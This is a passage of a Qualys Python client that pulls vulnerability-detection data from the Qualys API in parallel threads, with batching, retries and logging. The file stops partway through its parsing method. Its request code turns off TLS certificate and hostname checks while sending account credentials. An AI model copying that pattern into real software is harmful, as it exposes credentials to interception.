# -*- coding=iso-8859-1 -*- # Copyright 2019 Qualys Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ ------------------------------------------------------------------- qPyMultiThread.py ------------------------------------------------------------------- This tool is an example of using the practices outlined in the Qualys v2 API User Guide under the Best Practices Section https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf Recommendations To improve performance, Multi-threading should be used. Here is an outline of what the POC multi-threading script does to obtain the maximum throughput: 1. Make an initial API call to the Host List API endpoint to retrieve all host IDs for the subscription that need to have data retrieved. Note: Its important to do any filtering on hosts at this point, as filtering during the detection pull can impact performance. Host List API Endpoint: https://<qualysapi url>/api/2.0/fo/asset/host/ 2. Break the total Host IDs into batches of 1,000-5,000 and send to a Queue. 3. Launch X worker threads that will pull the batches from the Queue and launch an API call against: https://<qualysapi url>/ api/2.0/fo/asset/host/vm/detection/ Using Parameters: params = dict( action='list', show_igs=0, show_reopened_info=1, active_kernels_only=1, output_format='XML', status='Active,Re-Opened,New', vm_processed_after=<Date in UTC>, # Formatted as: '2019-04-05T00:00:01Z' truncation_limit = 0, ids=ids ) Considerations Batch size On the backend, the host detection engine will break up the number of hosts to retrieve information on with a maximum size of 10,000. Using a batch size higher than this will not add any benefit to performance. In the same context, there are multiple places that need to pull information so there is an overhead cost regardless of the size being used. For that reason, using a batch size too small can start to hinder performance slightly due to the overhead being used on small requests. Different parameters and the amount of total data on the backend can make requests vary in duration, it is best to experiment with different batch size?s during peak and non-peak hours to determine the optimal size to use. Error Handling Robust error handling and logging is key to any automation and is recommended to implement mechanisms to catch exceptions and retry with exponential back off when errors are encountered. This includes all functions dealing with connection requests, parsing, or writing to disk. Taking care to log as much precise detail as possible so it will be easier to audit later should the need arise. 
Parsing If an error is encountered, the API will return an error code and a description of the error, which will look like this: Simple Return with error: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE GENERIC_RETURN SYSTEM "https://qualysapi.qualys.com/api/2.0/simple_return.dtd?> <SIMPLE_RETURN> <RESPONSE> <DATETIME>2018-02-14T02:51:36Z</DATETIME> <CODE>1234</CODE> <TEXT>Description of Error</TEXT> </RESPONSE> </SIMPLE_RETURN> Generic Return with error: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE GENERIC_RETURN SYSTEM "https://qualysapi.qualys.com/generic_return.dtd"> <GENERIC_RETURN> <API name="index.php" username="username at="2018-02-13T06:09:27Z"> <RETURN status="FAILED" number="999">Internal error. Please contact customer support.</RETURN> </GENERIC_RETURN> <!-- Incident signature: 123a12b12c1de4f12345678901a12a12 //--> A full list of Error code Responses can be found in the API User Guide in Appendix 1 https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf Connection Errors With retrieving large amounts of data sets and continuously streaming through the API for prolonged periods of time, comes the possibility of running into edge cases with regards to connections. Whichever method is used to make the outbound connection to the API endpoint, it is recommended to set a timeout to abort/retry a connection if it hasn?t been established in a reasonable amount of time. This is to prevent stalling out a thread, resulting in reduced performance. Also consider these types of connection errors, amongst others: - Empty Responses - Timeouts - Connection Reset or Internal Error responses. Status codes: 503, 500. - Connection Closed These can be caused by either side of the connection, so need to be caught, logged, and if they continue then investigated. """ # --------- # Library Imports # --------- import copy import ssl import sys import time from optparse import IndentedHelpFormatter, OptionGroup, OptionParser, textwrap from random import randint from threading import Thread, current_thread import ipaddress from ipaddress import NetmaskValueError, AddressValueError try: from hashlib import sha1 as _sha, md5 as _md5 except ImportError: # prior to Python 2.5, these were separate modules import sha import md5 _sha = sha.new _md5 = md5.new try: import xml.etree.cElementTree as ET except ImportError: import xml.etree.ElementTree as ET # Check Python version so we can import the appropriate libraries _ver = sys.version_info #: Python 2.x? is_py2 = (_ver[0] == 2) #: Python 3.x? 
is_py3 = (_ver[0] == 3) if is_py2: import Queue as queue from urllib2 import urlopen, ProxyHandler, build_opener, install_opener, Request, HTTPSHandler, HTTPHandler from urllib2 import HTTPError, URLError from httplib import HTTPSConnection, HTTPException str = unicode if is_py3: import queue from builtins import object from builtins import next from builtins import range from builtins import str from future.moves.urllib.request import urlopen, ProxyHandler, build_opener, install_opener from future.moves.urllib.request import Request, HTTPSHandler, HTTPHandler from future.moves.urllib.error import HTTPError, URLError from http.client import HTTPSConnection from http.client import HTTPException from builtins import input as raw_input str = str # --------- # Local Imports # --------- import lib from lib.APIResponse import APIResponse, APIResponseError, XMLFileBufferedResponse from lib.APIRequest import APIRequest from lib.configuration import Configuration from lib.loghandler import * from lib import utils logHandler = logHandler('qPyMultiThread') init = Configuration() init.setupFileStructure() NORETRYCODES = [400] class HTTPSConnectionWithKeepAlive(HTTPSConnection): """TCP KEEPALIVE In order to set tcp keepalive we need to subclass HTTPSHandler Here is the source code for HTTPSHandler from urllib2 github repo https://github.com/python/cpython/blob/2.7/Lib/urllib2.py class HTTPSHandler(AbstractHTTPHandler): def __init__(self, debuglevel=0, context=None): AbstractHTTPHandler.__init__(self, debuglevel) self._context = context def https_open(self, req): return self.do_open(httplib.HTTPSConnection, req, context=self._context) https_request = AbstractHTTPHandler.do_request_ As urllib2.HTTPSHandler uses httplib.HTTPSConnection we need to subclass this also. The connect method would create the socket. def connect(self): "Connect to a host on a given (SSL) port." HTTPConnection.connect(self) if self._tunnel_host: server_hostname = self._tunnel_host else: server_hostname = self.host self.sock = self._context.wrap_socket(self.sock, server_hostname=server_hostname) This is the method we would need to add the socket option for keep-alive. Now, one of the challenge with low level TCP settings is that TCP stack for each OS has a different settings. Usage of the new Handler: http_handler = HTTPSHandlerWithKeepAlive() opener = urllib2.build_opener(http_handler) urllib2.install_opener(opener) """ def connect(self): HTTPSConnection.connect(self) keepalive_idle_sec = 50 keepalive_interval_sec = 10 keep_alive_max_fail = 25 # Identify each OS and set the socket options # All possible values: # https://docs.python.org/2/library/sys.html#sys.platform if sys.platform.startswith('linux'): # LINUX is pretty straight forward # setsockopt supports all the values self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, keepalive_idle_sec) self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, keepalive_interval_sec) self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, keep_alive_max_fail) elif sys.platform.startswith('darwin'): # MAC OSX - is similar to linux but the only probelem is that # on OSX python socket module does not export TCP_KEEPIDLE,TCP_KEEPINTVL,TCP_KEEPCNT constant. 
# Taking the value for TCP_KEEPIDLE from darwin tcp.h # https://github.com/apple/darwin-xnu/blob/master/bsd/netinet/tcp.h # define TCP_KEEPALIVE 0x10 /* idle time used when SO_KEEPALIVE is enabled */ # define TCP_KEEPINTVL 0x101 /* interval between keepalives */ # define TCP_KEEPCNT 0x102 /* number of keepalives before close */ # TCP_KEEPINTVL and TCP_KEEPCNT were added 5 years ago. So, older OSX would not support it. self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1) self.sock.setsockopt(socket.IPPROTO_TCP, 0x10, keepalive_idle_sec) self.sock.setsockopt(socket.IPPROTO_TCP, 0x101, keepalive_interval_sec) self.sock.setsockopt(socket.IPPROTO_TCP, 0x102, keep_alive_max_fail) elif sys.platform.startswith('win'): # WINDOWS - To set TCP Keepalive on windows need to use sock.ioctl and more info can be found here # https://msdn.microsoft.com/en-us/library/dd877220%28v=vs.85%29.aspx # The time is in milliseconds self.sock.ioctl(socket.SIO_KEEPALIVE_VALS, (1, keepalive_idle_sec * 1000, keepalive_interval_sec * 1000)) class Formatter(IndentedHelpFormatter): def format_description(self, description): if not description: return "" desc_width = 150 - self.current_indent indent = " " * self.current_indent # the above is still the same bits = description.split('\n') formatted_bits = [textwrap.fill(bit, desc_width, initial_indent = indent, subsequent_indent = indent) for bit in bits] result = "\n".join(formatted_bits) + "\n" return result def format_option_strings(self, option): """Return a comma-separated list of option strings & metavariables.""" self._short_opt_fmt = "%s" if option.takes_value(): metavar = option.metavar or option.dest.upper() short_opts = [self._short_opt_fmt % (sopt) for sopt in option._short_opts] long_opts = [self._long_opt_fmt % (lopt, metavar) for lopt in option._long_opts] else: short_opts = option._short_opts long_opts = option._long_opts if self.short_first: opts = short_opts + long_opts else: opts = long_opts + short_opts return ", ".join(opts) def format_epilog(self, epilog): return "\n" + epilog class HTTPSHandlerWithKeepAlive(HTTPSHandler): def https_open(self, req): return self.do_open(HTTPSConnectionWithKeepAlive, req) class CongifurationException(Exception): pass class APIClient(object): def __init__(self): self.timeout = 120 self.type = "GET" self.auth = None self.url = None self.responseHeaders = None self.config = None self.downloadAssets = False self.downloadDetections = False self.downloadHostAssets = False self.id_set = None self.logMessages = messages() self.log_host_detections = False self.log_host_details_in_detection = False self.collect_advanced_host_summary = False self.seed_file_enabled = False self.log_host_summary = False self.completedThreads = [] self.totalBytes = 0 self.total_hosts = 0 self.remaining = 0 self.completed = 0 self.host_logged = 0 self.receivedBytes = 0 self.vulns = 0 self.detectionParameters = dict( action = 'list', show_igs = 0, show_reopened_info = 1, # active_kernels_only=1, output_format = 'XML', status = 'Active,Re-Opened,New', # detection_processed_after=self.config.detectionDelta, truncation_limit = 0 ) def validate(self): """This method is to validate configured proxy and Qualys credentials work before launching. """ validateresponse = None logHandler.dynamicLogger("Validating Credentials to %s ..." 
% (self.config.baseURL + self.config.validateURL)) if self.config.useProxy: proxytest = ProxyHandler({'https': self.config.proxyHost}) proxyopener = build_opener(proxytest) try: install_opener(proxyopener) except Exception as e: logHandler.dynamicLogger("Failed to install proxy", logLevel = 'error') return str(e) request = APIRequest( type = 'GET', username = self.config.username, password = self.config.password) request.build_headers() validatereq = Request( self.config.baseURL + self.config.validateURL, data = None, headers = request.headers) try: # make request ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE https_handler = HTTPSHandler(debuglevel = 1) http_handler = HTTPHandler(debuglevel = 1) opener = build_opener(https_handler) opener2 = build_opener(http_handler) install_opener(opener) install_opener(opener2) validateresponse = urlopen(validatereq, timeout = self.timeout, context = ctx) APIResponse.responseHeaders = validateresponse.info() logHandler.dynamicLogger("Got response from Proxy, and msp/about.php endpoint...") return APIResponse except (URLError, HTTPError) as ue: logHandler.checkException(exception = ue, request = validatereq, retrycount = 0) # Failed validation of proxy or authentication return False except ssl.SSLError as e: context = 'SSLError' traceback = None if self.config.debug: import traceback logHandler.checkException( exception = e, request = validatereq, response = validateresponse, context = context, retrycount = 0) return False except IOError as e: # This will occur if something happens while iterating through the chunked response being written # to file. Usually it means either a problem writing to disk, or a # transient error occurred. import traceback logHandler.dynamicLogger( self.logMessages.message(IOERROR), duration = 0, url = validatereq.get_full_url() if validatereq is not None else None, traceback = traceback.format_exc(), exception = e, retrycount = 0) return False def closeConn(self, conn): """Cleanly close a urllib2.urlopen connection :param conn: urllib2.urlopen """ try: conn.close() except (AttributeError, NameError): # Connection didnt exist, safe to just pass pass def callDuration(self, startTime = None): """Given a start Time, return the delta between now and then :param startTime: time.time() :return: (int) seconds """ if startTime is None: return 0 endTime = time.time() return round(endTime - startTime, 2) def post(self, url, data = None, response = None, **kwargs): """Sends a POST request. Returns :class:APIResponse object. :param url: URL for the new :class:APIRequest object. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:APIRequest. :param \*\*kwargs: Optional arguments that ``call_api`` takes. :return: APIResponse """ return self.call_api( method = 'POST', api_route = url, data = data, response = response, **kwargs) def get(self, url = None, data = None, response = None, **kwargs): """Sends a POST request. Returns :class:APIResponse object. :param url: URL for the new :class:APIRequest object. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:APIRequest. :param \*\*kwargs: Optional arguments that ``call_api`` takes. :return: APIResponse """ return self.call_api( method = 'GET', api_route = url, data = data, response = response, **kwargs) def makeHash(self, value = None): """ Return a hashed string, given an input. 
:param name: String value to encode :return: String hash """ value = str(value) + str(randint(10000, 99999)) result = _md5(str(value).encode('utf-8')) hash = result.hexdigest() return hash def call_api(self, api_route = None, data = None, method = None, response = None, filename = None, **kwargs): """ This method does the actual API call. Returns response or raises an Exception. Does not support proxy at this moment. :param api_route: (str) full url to make a request to :param data: (optional) file-like object to send in the body of the :class:APIRequest :param method: HTTP method to make the :class:APIRequest :param response: Class of the Response Handler :param kwargs: Optional Arguments :return: APIResponse """ ids = None retrycount = 0 hash = self.makeHash(int(time.time())) request = None # Enable http level debugging if in debug mode # urllib HTTP debug logging uses print, so will go to stdout # i.e: httplib.HTTPResponse#_read_status(): # if self.debuglevel > 0: # print "reply:", repr(line) http_handler = HTTPSHandlerWithKeepAlive(debuglevel = self.config.debug) opener = build_opener(http_handler) install_opener(opener) # Prepare request prepared = APIRequest( type = method, username = self.config.username, password = self.config.password, data = data, api_route = api_route, hash = hash) req = prepared.build_request() while True: try: # Previous attempt failed, retry with exponential backoff if retrycount > 0: logHandler.dynamicLogger(self.logMessages.message(RETRY), sleep = (30 + (2 ** retrycount)), count = retrycount) time.sleep(30 + (2 ** retrycount)) prepared.hash = self.makeHash(int(time.time())) req = prepared.build_request() starttime = time.time() # Log Request details if not self.config.debug and isinstance(data, dict): # Create a copy, to remove the ids parameter for logging datacopy = copy.deepcopy(data) loglevel = DEBUG if 'ids' in datacopy: del datacopy['ids'] datacopy = '&'.join("%s=%r" % (key, val) for (key, val) in datacopy.items()) datacopy = datacopy.replace("'", "") else: datacopy = data if not isinstance(data, dict): datacopy = "<XML Post Data>" loglevel = INFO msg = LOGPROXYCALL if self.config.useProxy is True else LOGCALL logHandler.dynamicLogger( self.logMessages.message(msg) + " Request Hash: %s" % prepared.hash, url = api_route, params = datacopy, loglevel = loglevel) # Make Request ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE request = urlopen(req, timeout = self.timeout, context = ctx) # Send response to XMLFileBufferedResponse class for handling response.response = request duration = self.callDuration(startTime = starttime) if not response.get_response(): logHandler.dynamicLogger("Error during Fetching for Request Hash: %s, Cleaning up and retrying", hash, logLevel = DEBUG) keep_running = True self.cleanup(response.file_name) retrycount += 1 continue # received, parsed, and saved response. Log its size, # and return. logHandler.dynamicLogger( self.logMessages.message(GOTRESPONSE), status = request.getcode(), duration = duration, hash = prepared.hash) self.receivedBytes += response.totalSize return response # Handle the different exceptions that can occur. Unless explicitly # told to stop, retry forever. # FIXME - Make retries configurable, both by max retries, and types # of exceptions to bail on. 
except (URLError, HTTPError, HTTPException) as ue: retrycount += 1 if isinstance(ue.reason, HTTPException): context = HTTPEXCEPTION else: context = None # Exception handling for the various http codes/reasons returned shouldretry = logHandler.checkException( exception = ue, request = req, response = response, context = context, retrycount = retrycount, NoRetryCodes = self.config.NoRetryCodes, hash = prepared.hash) self.renameFile(filename, filename + ".errored", hash = prepared.hash) if request is not None: self.closeConn(request) if shouldretry: continue else: logHandler.dynamicLogger('Not Retrying, hit unretriable exception: %s', ue) break except ssl.SSLError as e: retrycount += 1 context = 'SSLError' traceback = None shouldretry = logHandler.checkException(exception = e, request = req, response = response, context = context, retrycount = retrycount, NoRetryCodes = self.config.NoRetryCodes, hash = prepared.hash) self.renameFile(filename, filename + ".errored", hash = prepared.hash) if request is not None: self.closeConn(request) if shouldretry: continue else: break except IOError as e: # This will occur if something happens while iterating through the chunked response being written # to file. Usually it means either a problem writing to disk, # or a transient error occurred (Connection Timeout, Connection Reset) import traceback retrycount += 1 duration = self.callDuration(startTime = starttime) logHandler.dynamicLogger(self.logMessages.message(IOERROR), duration = duration, url = req.get_full_url() if req is not None else None, traceback = traceback.format_exc(), exception = e, retrycount = retrycount, hash = prepared.hash) self.renameFile(filename, filename + ".errored", hash = prepared.hash) if request is not None: self.closeConn(request) continue # FIXME Catchall for edge cases - include traceback to find out why it wasn't caught # Remove once these no longer occur, or its no longer needed. 
except Exception as e: import traceback retrycount += 1 endtime = time.time() totaltime = endtime - starttime logHandler.dynamicLogger( self.logMessages.message(UNHANDLEDEXCEPTION), duration = totaltime, url = req.get_full_url() if req is not None else None, traceback = traceback.format_exc(), exception = e, retrycount = retrycount, hash = prepared.hash) self.renameFile(filename, filename + ".errored", hash = prepared.hash) if request is not None: self.closeConn(request) break def get_asset_ids_portal(self): """This method will fetch all the host ids in single API call.""" data = '''<ServiceRequest> <filters> <Criteria field="lastVulnScan" operator="GREATER">%s</Criteria> </filters> <preferences> <startFromId>1</startFromId> <limitResults>0</limitResults> </preferences> </ServiceRequest>''' % self.config.detectionDelta api_route = '/qps/rest/2.0/ids/am/hostdetection' asset_ids = [] host_ids = [] logHandler.dynamicLogger("Fetching asset ids from portal..") filename = self.config.outputDir + "/assets/portalasset_ids_%s_%s.xml" % ( os.getpid(), current_thread().getName()) keep_running = True while keep_running: # Make an API call and send it to XMLFileBufferedResponse self.post(self.config.baseURL + api_route, data = data, response = XMLFileBufferedResponse(file_name = filename, logger = logHandler), filename = filename) time.sleep(5) logHandler.dynamicLogger("Wrote API response to {filename}", filename = filename) logHandler.dynamicLogger("Parsing IDs..") tree = ET.parse(filename) root = tree.getroot() response_element = root.find('data') if response_element is None: logHandler.dynamicLogger("data tag not found") else: for id_element in response_element.findall('HostDetection'): if id_element.find('id').text is not None: asset_ids.append(id_element.find('id').text) # if id_element.find('qwebHostId').text is not None: # host_ids.append(id_element.find('qwebHostId').text) keep_running = False return asset_ids def get_asset_ids(self): """This method will fetch all the host ids in single API call.""" api_route = '/api/2.0/fo/asset/host/' params = dict( action = 'list', truncation_limit = 0, vm_processed_after = self.config.detectionDelta, ) asset_ids = [] if self.config.pullbyip: roottag = 'HOST_LIST' childtag = 'HOST/IP' params['details'] = 'Basic' else: roottag = 'ID_SET' childtag = 'ID' params['details'] = 'None' logHandler.dynamicLogger("Fetching asset ids..") filename = self.config.outputDir + "/assets/asset_ids_%s_%s.xml" % ( os.getpid(), current_thread().getName()) keep_running = True while keep_running: # Make an API call and send it to XMLFileBufferedResponse self.get( self.config.baseURL + api_route, data = params, response = XMLFileBufferedResponse(file_name = filename, logger = logHandler), filename = filename ) time.sleep(5) logHandler.dynamicLogger("Wrote API response to {filename}", filename = filename) logHandler.dynamicLogger("Parsing IDs..") tree = ET.parse(filename) root = tree.getroot() response_element = root.find('RESPONSE') if response_element is None: logHandler.dynamicLogger("RESPONSE tag not found") id_set = response_element.find(roottag) if id_set is None: logHandler.dynamicLogger("%s not found" % roottag) else: for id_element in id_set.findall(childtag): asset_ids.append(id_element.text) keep_running = False return asset_ids def vm_detection_coordinator(self, detectionQueue = None): """This method is the entry point of each detection thread. It pops out an id range entry from detection queue, and calls download_host_detections passing id range as argument. 
""" keep_running = True ips = None asset_ips = [] while keep_running: try: logHandler.dynamicLogger("Getting batch from detection_idset_queue") log_range = id_range = detectionQueue.get(False) if self.config.pullbyip: for i in id_range.split(','): asset_ips.append(utils.int2ip(int(i))) ips = ",".join(map(str, asset_ips)) log_range = ips logHandler.dynamicLogger("Processing batch: {idrange}", idrange = log_range, logLevel = DEBUG) self.download_host_detections(id_range, ips) detectionQueue.task_done() except queue.Empty: logHandler.dynamicLogger("detection_idset_queue is empty. Exiting.") keep_running = False def portal_assethost_coordinator(self, hostAsset = None): """This method is the entry point of each HostAsset thread. It pops out an id range entry from detection queue, and calls download_host_detections passing id range as argument. """ keep_running = True while keep_running: try: logHandler.dynamicLogger("Getting batch from HostAsset_idset_queue") id_range = hostAsset.get(False) logHandler.dynamicLogger("Processing batch: {idrange}", idrange = id_range, logLevel = DEBUG) self.download_portal_assethost(id_range) hostAsset.task_done() except queue.Empty: logHandler.dynamicLogger("HostAsset_idset_queue is empty. Exiting.") keep_running = False def chunk(self, ids): """Given a String list of Asset Ids, split them using the ',' delimiter string and then return in String range in the format of {First Entry} - {Last Entry} i.e String "1,2,3,4,5" to "1-5" :param ids: String comma-seperated list of Asset Ids :return: String Range """ chunks = ids.split(',') if self.config.pullbyip: id1 = utils.int2ip(int(chunks[0])) id2 = utils.int2ip(int(chunks[-1])) else: id1 = chunks[0] id2 = chunks[-1] idset = "%s-%s" % (id1, id2) return idset def cleanup(self, filename): """Safely remove a file :param filename: Name of file to try to delete. """ try: logHandler.dynamicLogger('Cleaning up filename: %s' % filename, logLevel = DEBUG) os.remove(filename) # pause to give OS time to remove the file time.sleep(3) except OSError: # File didnt exist, so just pass pass def renameFile(self, oldFileName, newFileName, hash = None): """Rename a filename from the given old name. :param oldFileName: (str) filename to rename from. :param newFileName: (str) filename to rename to. """ if oldFileName is None: logHandler.dynamicLogger('Filename is null.. Not renaming..') else: try: if hash is None: hash = randint(10000, 99999) newFileName = newFileName + ".%s" % hash os.rename(oldFileName, newFileName) if self.config.debug: logHandler.dynamicLogger('Renamed old file: %s to: %s' % (oldFileName, newFileName), logLevel = DEBUG) except OSError: pass def determineFilename(self, ids = None, pid = None, thread = None, batch = None, extension = None, startTime = None): """When Internal Error or Malformed exceptions are returned, api_params wont always be defined Make sure this is caught, and revert to saving to another filename with a datetime instead. 
:param ids: ID Range used in filename :param pid: PID used in filename :param thread: thread used in filename :param batch: batch used in filename :param extension: extension to use in filename (defaults to xml) :param startTime: a time.time() representation of when the API call started :return: String filename """ if ids is not None: filename = self.logMessages.message(FILENAMEERRORED).format( dir = self.config.tempDirectory, range = ids, pid = pid, thread = thread, batch = batch, rand = randint(10000, 99999), extension = extension) else: filename = self.logMessages.message(FILENAMEERROREDTIME).format( dir = self.config.tempDirectory, time = startTime.strftime('%Y-%m-%d-%M-%S'), pid = pid, thread = thread, batch = batch, rand = randint(10000, 99999), extension = extension) return filename def verifyResponse(self, parseresponse, filename = None, orig_filename = None ): """An HTTP response from Qualys API endpoints can be returned as a 200 Okay, and still have errors. Client Errors, and sometimes transient errors will be returned in the RESPONSE tag of the XML with the following info Tags: CODE : This contains a special code representing the specific error that occurred. A full list of error codes is located in the API User Guide. Message : This will contain a description of the error code, to give you more information as to what happened. This method will parse the response and check for those errors, and rename and move the XML file to the tmp directory to allow referencing later. :param parseresponse: parsed response from the _parse() method which will contain a dict of errors :param orig_filename: original filename :return: True if their are no errors, False otherwise. """ if "Internal Error" in parseresponse or "Internal error" in parseresponse: logHandler.dynamicLogger( "API Internal Error, Leaving File {filename}, and Retrying", filename = filename, logLevel = DEBUG) self.renameFile(oldFileName = orig_filename, newFileName = filename) return False elif "not well-formed" in parseresponse: logHandler.dynamicLogger( "Malformed XML detected in {filename}, Retrying", filename = filename, logLevel = DEBUG) self.renameFile(oldFileName = orig_filename, newFileName = filename) return False else: return True def getETA(self): """This method averages the durations for all completed threads, and estimates an ETA to complete """ allThreads = 0 for i in self.completedThreads: allThreads += i avgTime = round((allThreads / len(self.completedThreads)), 0) remainingBatches = round(self.remaining / self.config.chunkSize, 0) eta = round(((remainingBatches * avgTime) / self.config.numDetectionThreads) / 60, 2) if self.config.debug: logHandler.dynamicLogger( "completedThreads durations: {completed}, Total for all Threads: {allThreads}, " "avgTime: {avgTime}, remainingBatches: {remainingBatches}, eta: {eta} minutes, " "totalRemaining hosts: {remainingHosts}, " "totalCompleted hosts: {completedHosts}", completed = self.completedThreads, allThreads = allThreads, avgTime = avgTime, remainingBatches = remainingBatches, eta = eta, remainingHosts = self.remaining, completedHosts = self.completed, logLevel = DEBUG) return eta def download_host_detections(self, ids, asset_ips = None): """This method will invoke call_api method for asset/host/vm/detection/ API.""" api_route = '/api/2.0/fo/asset/host/vm/detection/' params = self.detectionParameters params['vm_processed_after'] = self.config.detectionDelta if asset_ips is not None: params['ips'] = asset_ips else: params['ids'] = ids batch = 1 keep_running = True 
file_extension = 'xml' # Convert the list of ids into a Range to use in the filename. # i.e 123456-999999 instead of 123456,123457,123458... idset = self.chunk(ids) logHandler.dynamicLogger("Downloading VM detections for batch: {idset}", idset = idset) if params['output_format'] != 'XML': file_extension = 'csv' params['truncation_limit'] = 0 while keep_running: filename = self.config.outputDir + "/vm_detections/vm_detections_Range-%s_Process-%s_%s_Batch-%d.%s" % ( idset, os.getpid(), current_thread().getName(), batch, file_extension) startTime = time.time() # Make Request response = self.get( url = self.config.baseURL + api_route, data = params, response = XMLFileBufferedResponse(file_name = filename, logger = logHandler), filename = filename) duration = self.callDuration(startTime = startTime) self.completedThreads.append(duration) size = 0 if response.totalSize is not None: size = response.totalSize self.totalBytes = self.totalBytes + response.totalSize logHandler.dynamicLogger( "Wrote API response with {size} bytes, " "avg speed: {speed} KB/sec, " "Combined speed: {combinedSpeed} KB/sec " "API Duration: {duration}, to {filename}, " "Hosts remaining: {remaining}, " "ETA until completion: {ETA} minutes, " "Total Data received: {totalBytesreceived} MB, " "Projected Total size: {projectedTotal} MB", size = size, speed = round(response.totalSize / duration / 1000, 2), combinedSpeed = round((response.totalSize / duration / 1000) * self.config.numDetectionThreads, 2), duration = duration, remaining = self.remaining, ETA = self.getETA(), totalBytesreceived = round((self.totalBytes / 1024 / 1024), 2), projectedTotal = round( ((size * (self.remaining / self.config.chunkSize)) + self.totalBytes) / 1024 / 1024, 2), filename = filename) # API Endpoint returned data, parse it for error codes, and # completeness. Retry if needed. parsed = self._parse(filename, format = params['output_format']) vfileName = self.determineFilename(ids = idset, pid = os.getpid(), thread = current_thread().getName(), batch = batch, extension = file_extension) verified = self.verifyResponse(parseresponse = parsed, orig_filename = filename, filename = vfileName) if not verified: keep_running = True self.cleanup(filename) continue # Check if the result was truncated, and another batch needs to be retrieved # Note we can only get here after successfully receiving, parsing, and saving the result # of an API call into a file. A Missing Response XML Tag should never occur in a # VM Host Detection API call. if params['output_format'] == 'XML': if not os.path.isfile(filename): continue tree = ET.parse(filename) root = tree.getroot() response_element = root.find('RESPONSE') if response_element is None: logHandler.dynamicLogger( "RESPONSE tag not found in {filename}. 
Please check the file.", filename = filename, logLevel = 'error') keep_running = False warning_element = response_element.find('WARNING') if warning_element is None: keep_running = False else: next_page_url = warning_element.find('URL').text params = utils.get_params_from_url(url = next_page_url) batch += 1 def download_portal_assethost(self, ids): """This method will invoke call_api method for asset/host/vm/detection/ API.""" api_route = '/qps/rest/2.0/search/am/hostdetection' params = """<ServiceRequest> <filters> <Criteria field="id" operator="IN">%s</Criteria> <Criteria field="detection.found" operator="EQUALS">true</Criteria> <Criteria field="detection.ignored" operator="EQUALS">false</Criteria> <Criteria field="detection.disabled" operator="EQUALS">false</Criteria> <Criteria field="detection.showresults" operator="EQUALS">false</Criteria> <Criteria field="detection.typeDetected" operator="IN">4,2</Criteria> <Criteria field="detection.nonRunningKernal" operator="EQUALS">false</Criteria> </filters> <preferences> <startFromId>1</startFromId> <limitResults>%s</limitResults> </preferences> </ServiceRequest>""" % (ids, self.config.chunkSize) batch = 1 keep_running = True file_extension = 'xml' # Convert the list of ids into a Range to use in the filename. # i.e 123456-999999 instead of 123456,123457,123458... idset = self.chunk(ids) logHandler.dynamicLogger("Downloading Portal data for ids {idset}", idset = idset) while keep_running: filename = self.config.outputDir + "/portal/Portal_hostasset_Range-%s_Process-%s_%s_Batch-%d.%s" % ( idset, os.getpid(), current_thread().getName(), batch, file_extension) startTime = time.time() # Make Request response = self.post( url = self.config.baseURL + api_route, data = params, response = XMLFileBufferedResponse(file_name = filename, logger = logHandler), filename = filename) duration = self.callDuration(startTime = startTime) self.completedThreads.append(duration) size = 0 if response.totalSize is not None: size = response.totalSize logHandler.dynamicLogger( "Wrote API response with {size} bytes, " "avg speed: {speed} kb/sec, " "API Duration: {duration}, to {filename}, " "Hosts remaining: {remaining}, " "ETA until completion: {ETA} minutes", size = size, speed = round(response.totalSize / duration / 1000, 2), duration = duration, remaining = self.remaining, ETA = self.getETA(), filename = filename) # API Endpoint returned data, parse it for error codes, and # completeness. Retry if needed. parsed = self._parse(filename) vfileName = self.determineFilename(ids = idset, pid = os.getpid(), thread = current_thread().getName(), batch = batch, extension = file_extension) verified = self.verifyResponse(parseresponse = parsed, orig_filename = filename, filename = vfileName) if not verified: keep_running = True self.cleanup(filename) continue else: keep_running = False def _parse(self, file_name, format = None): """Parse the resulting file gathered from the Qualys API Endpoint. Since error codes for incorrect parameters, and possibly transient errors can be returned, Need to double check the final XML file for error codes, and completeness. If there is a transient error, then send back for a retry, otherwise raise an Exception. :param file_name: XML file to parse :return: dict or an Exception message if applicable. 
""" logHandler.dynamicLogger("Parsing detection file %s" % file_name) total = 0 logged = 0 response = {'error': False} load_next_batch = False next_url = None try: context = iter(ET.iterparse(file_name, events = ('end',))) _, root = next(context) for event, elem in context: # Handle client errors if elem.tag == "RESPONSE": code = elem.find('CODE') error = elem.find('TEXT') if code is not None: logHandler.dynamicLogger( "API Client ERROR. Code={errorcode}, Message={errorText}", errorcode = code.text, errorText = error.text) elem.clear() # We dont want to retry these client errors, so raise # an Exception raise APIResponseError("API Client Error. Code=%s, Message=%s" % (code.text, error.text)) elem.clear() # Internal Errors resulting in a 999 response will be DOCTYPE # GENERIC_RETURN elif elem.tag == "GENERIC_RETURN": code = elem.find('RETURN') if code is not None: if "Internal error" in code.text: elem.clear() raise ET.ParseError("API Error - Found Internal Error. Clean up and Retry") elem.clear() elif elem.tag == 'HOST': total += 1 if self._process_root_element(elem): logged += 1 elem.clear() elif elem.tag == "WARNING": load_next_batch = True next_url = elem.find('URL') elem.clear() root.clear() except ET.ParseError as e: logHandler.dynamicLogger( "Failed to parse API Output for endpoint {endpoint}. Message: {message}", endpoint = self.config.baseURL, message = str(e), logLevel = ERROR) try: self.renameFile(oldFileName = file_name, newFileName = file_name + ".errored") except Exception as err: logHandler.dynamicLogger( "Could not rename errored xml response filename. Reason: {message}", message = 